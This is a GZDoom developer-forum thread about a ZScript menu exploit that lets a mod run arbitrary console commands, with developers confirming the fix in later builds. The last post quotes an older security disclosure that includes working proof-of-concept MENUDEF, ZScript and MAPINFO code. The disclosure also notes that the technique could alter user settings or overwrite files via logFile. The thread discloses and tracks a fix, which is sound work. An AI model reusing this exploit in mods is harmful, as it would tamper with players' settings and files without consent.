Console Command Exploit

Here, developers communicate stuff that does not go onto the main News section or the front page of the site.
[Dev Blog] [Development Builds] [Git Change Log] [GZDoom Github Repo]

Moderator: GZDoom Developers

Re: Console Command Exploit

Postby Graf Zahl » Fri Jun 18, 2021 11:41 pm

This has already been fixed after 4.6.0. Current devbuilds will throw a VM abort if this is launched.
User avatar
Graf Zahl
Lead GZDoom+Raze Developer
Lead GZDoom+Raze Developer
 
Joined: 19 Jul 2003
Location: Germany

Re: Console Command Exploit

Postby yum13241 » Sat Jun 19, 2021 2:18 pm

Graf Zahl wrote:This has already been fixed after 4.6.0. Current devbuilds will throw a VM abort if this is launched.



So until the next official release, I have to be careful. Edit: or I have to use devbuilds.
yum13241
 
Joined: 10 May 2021
Discord: yum13241#8226
Operating System: Windows 10/8.1/8/201x 64-bit
OS Test Version: No (Using Stable Public Version)
Graphics Processor: Intel (Modern GZDoom)

Re: Console Command Exploit

Postby TheMightyHeracross » Sat Jun 19, 2021 2:50 pm

Interesting. I cannot reproduce on my copy of GZDoom 4.6.0.
User avatar
TheMightyHeracross
...and remember: his silence is golden.
 
Joined: 18 Aug 2013
Location: Philadelphia, PA
Discord: TheMightyHeracross#1716
Operating System: Debian-like Linux (Debian, Ubuntu, Mint, etc) 64-bit

Re: Console Command Exploit

Postby yum13241 » Sat Jun 19, 2021 2:58 pm

TheMightyHeracross wrote:Interesting. I cannot reproduce on my copy of GZDoom 4.6.0.



Does it crash? If it's fixed, it will crash, if not, it will say "HI!"
yum13241
 
Joined: 10 May 2021
Discord: yum13241#8226
Operating System: Windows 10/8.1/8/201x 64-bit
OS Test Version: No (Using Stable Public Version)
Graphics Processor: Intel (Modern GZDoom)

Re: Console Command Exploit

Postby TheMightyHeracross » Sat Jun 19, 2021 3:09 pm

Ah! Missed the part where I have to summon the "Evil" actor, yeah I get the message now. Good thing it's fixed already for the next version.
User avatar
TheMightyHeracross
...and remember: his silence is golden.
 
Joined: 18 Aug 2013
Location: Philadelphia, PA
Discord: TheMightyHeracross#1716
Operating System: Debian-like Linux (Debian, Ubuntu, Mint, etc) 64-bit

Re: Console Command Exploit

Postby yum13241 » Sat Jun 19, 2021 4:12 pm

TheMightyHeracross wrote:Ah! Missed the part where I have to summon the "Evil" actor, yeah I get the message now. Good thing it's fixed already for the next version.


Yeah, thank God a fix is alr in a devbuild. Now it's time to hope the fix doesn't break stuff... and to wait too...
yum13241
 
Joined: 10 May 2021
Discord: yum13241#8226
Operating System: Windows 10/8.1/8/201x 64-bit
OS Test Version: No (Using Stable Public Version)
Graphics Processor: Intel (Modern GZDoom)

Re: Console Command Exploit

Postby Matt » Fri Jul 02, 2021 2:00 pm

The "Hi!" will also print in LZDoom 3.87c.

Anyone have any idea when this had started working again?
User avatar
Matt
Putting the XD into *xdeath since 2007
 
Joined: 04 Jan 2004
Location: Gotham City SAR, Wyld-Lands of the Lotus People, Dominionist PetroConfederacy of Saudi Canadia

Re: Console Command Exploit

Postby Graf Zahl » Fri Jul 02, 2021 2:03 pm

Some time ago I changed how the menu exploit guards work to make them more robust - but I missed one of the function requiring the change so it still used the old method which no longer worked because all its helper code was removed.
User avatar
Graf Zahl
Lead GZDoom+Raze Developer
Lead GZDoom+Raze Developer
 
Joined: 19 Jul 2003
Location: Germany

Re: Console Command Exploit

Postby drfrag » Fri Jul 02, 2021 2:53 pm

Matt wrote:The "Hi!" will also print in LZDoom 3.87c.

Try with the latest devbuild.
User avatar
drfrag
Os voy a romper a pedazos!
Vintage GZDoom Developer
 
Joined: 23 Apr 2004
Location: Spain
Discord: drfrag#3555
Github ID: drfrag666

Re: Console Command Exploit

Postby Matt » Fri Jul 02, 2021 8:33 pm

drfrag wrote:
Matt wrote:The "Hi!" will also print in LZDoom 3.87c.

Try with the latest devbuild.
As of June 30, crashes to desktop with "Attempt to execute CCMD 'echo hi!' outside of menu code".
User avatar
Matt
Putting the XD into *xdeath since 2007
 
Joined: 04 Jan 2004
Location: Gotham City SAR, Wyld-Lands of the Lotus People, Dominionist PetroConfederacy of Saudi Canadia

Re: Console Command Exploit

Postby Graf Zahl » Sat Jul 03, 2021 1:11 am

It doesn't crash. A VM abort is not a crash!
User avatar
Graf Zahl
Lead GZDoom+Raze Developer
Lead GZDoom+Raze Developer
 
Joined: 19 Jul 2003
Location: Germany

Re: Console Command Exploit

Postby Marisa Kirisame » Sun Jul 25, 2021 5:52 am

It's not a VM abort, it's a fatal error.
User avatar
Marisa Kirisame
ZScript Crimester
 
 
 
Joined: 08 Feb 2008
Location: Vigo, Galicia
Discord: 霧雨魔理沙#1666
Twitch ID: MarisaDOOM
Github ID: OrdinaryMagician
Operating System: Other Linux 64-bit
OS Test Version: No (Using Stable Public Version)
Graphics Processor: nVidia with Vulkan support

Re: Console Command Exploit

Postby Graf Zahl » Sun Jul 25, 2021 9:11 am

It's still not a crash.
User avatar
Graf Zahl
Lead GZDoom+Raze Developer
Lead GZDoom+Raze Developer
 
Joined: 19 Jul 2003
Location: Germany

Re: Console Command Exploit

Postby Marisa Kirisame » Sun Jul 25, 2021 10:25 am

Actually it does crash immediately after with a segfault. I should report that as a bug. It happens after any fatal error.
User avatar
Marisa Kirisame
ZScript Crimester
 
 
 
Joined: 08 Feb 2008
Location: Vigo, Galicia
Discord: 霧雨魔理沙#1666
Twitch ID: MarisaDOOM
Github ID: OrdinaryMagician
Operating System: Other Linux 64-bit
OS Test Version: No (Using Stable Public Version)
Graphics Processor: nVidia with Vulkan support

Re: Console Command Exploit

Postby yum13241 » Wed Jul 28, 2021 7:40 am

The Zombie Killer wrote:[Developer's note: This post has been edited from its original form for clarity]

This post serves as disclosure for an exploit that was recently discovered in ZScript.

The exploit affects all versions between 3.0.0 to 3.2.3, but has been patched in 3.2.4.

The Exploit
ZScript has exposed various features to modders, one of these being the underlying code for the classes powering MENUDEF.
However, the exposure of this MENUDEF code has brought some security concerns along with it.

In MENUDEF, you are able to create menu items that will execute a console command when a user selects them, via the "Command" item.
The code behind this item has a private method named "DoCommand", which is effectively a ZScript version of Zandronum's famous "ConsoleCommand", but without the whitelist.

Normally, you aren't able to make use of DoCommand, as it's private and mostly barred off.
If the item's ZScript class is not "OptionMenuItemSafeCommand", the following checks are made:

  • The command will not execute if a menu is not active.
  • The command will not execute if the active menu is not an OptionMenu.
  • The command will not execute if the Command item does not exist in the active menu (eg, if you created it with new()).

You would expect this to cover the hole pretty well. However, it proved to be trivial to circumvent the above checks.

You could create your own menu linked to ZScript and give it a "Command" item. From there you could modify the Command item's action (the console command it executes) and then proceed to open and close the menu to run the command. The entire MENUDEF file looks like this:

Code: Select allExpand view
OptionMenu "ConsoleCommandMenu"
{
    class "ConsoleCommandMenu"
    Command "", ""
}


And all of the ZScript backing it up is as follows:

Code: Select allExpand view
version "3.2.0"

class ConsoleCommandMenu : OptionMenu
{
    static void Execute(Name command)
    {
        Menu.SetMenu('ConsoleCommandMenu');
        let desc = OptionMenuDescriptor(MenuDescriptor.GetDescriptor('ConsoleCommandMenu'));
        let item = OptionMenuItemCommand(desc.mItems[0]);
        item.Init("", command);
        item.Activate();
        Menu.GetCurrentMenu().Close();
    }
}

class ConsoleCommand
{
    string Command;
    int    GameTic;

    static play void Execute(string command)
    {
        ConsoleCommandHandler.QueueCommand(command);
    }
}

class ConsoleCommandHandler : EventHandler
{
    private Array<ConsoleCommand> m_Commands;

    static void QueueCommand(string command)
    {
        let cmd     = new("ConsoleCommand");
        cmd.Command = command;
        cmd.GameTic = gametic;

        ConsoleCommandHandler(
            EventHandler.Find("ConsoleCommandHandler"))
                        .m_Commands.Push(cmd);
    }

    override void WorldTick()
    {
        for(int i = 0; i < m_Commands.Size(); i++)
        {
            if (m_Commands[i].GameTic == gametic - 1) continue;

            m_Commands[i].Destroy();
            m_Commands.Delete(i);

            i = -1;
        }
    }

    override void UiTick()
    {
        for(int i = 0; i < m_Commands.Size(); i++)
        {
            if (m_Commands[i].GameTic == gametic - 1)
                ConsoleCommandMenu.Execute(m_Commands[i].Command);
        }
    }
}


The ZScript code effectively queues up console commands using a custom structure, and executes them by opening and closing the menu after modifying the Command item's action (using the Init() method).
After the above code has been written, all that's left to do for this to be usable is to hook up the EventHandler in MAPINFO:

Code: Select allExpand view
GameInfo
{
    AddEventHandlers = "ConsoleCommandHandler"
}


And now we're free to execute console commands at will:

Code: Select allExpand view
ConsoleCommand.Execute("echo hi!");


Concerns
Of course, this brings with it a number of concerns. A very incomplete list of which can be found below:

  • A user's settings including bindings, audio volume, player name, colour, etc can all be permanently modified.
  • Files on the user's system can be overwritten with the logFile command.

As this exploit has been patched in 3.2.4 to the point of not being able to modify arbitrary files on a user's system, I strongly suggest that you update.

Sample
Attached below is a sample pk3 demonstrating the exploit. Run the sample with a version of GZDoom prior to 3.2.4 and spawn the "Evil" actor to see it in action.


Good news, a VM abort happens in 4.6.1, rather than saying "Hi!" like in 4.6.0. Thanks devs! Peace of mind.
yum13241
 
Joined: 10 May 2021
Discord: yum13241#8226
Operating System: Windows 10/8.1/8/201x 64-bit
OS Test Version: No (Using Stable Public Version)
Graphics Processor: Intel (Modern GZDoom)

Previous

Return to Developer Blog

Who is online

Users browsing this forum: No registered users and 0 guests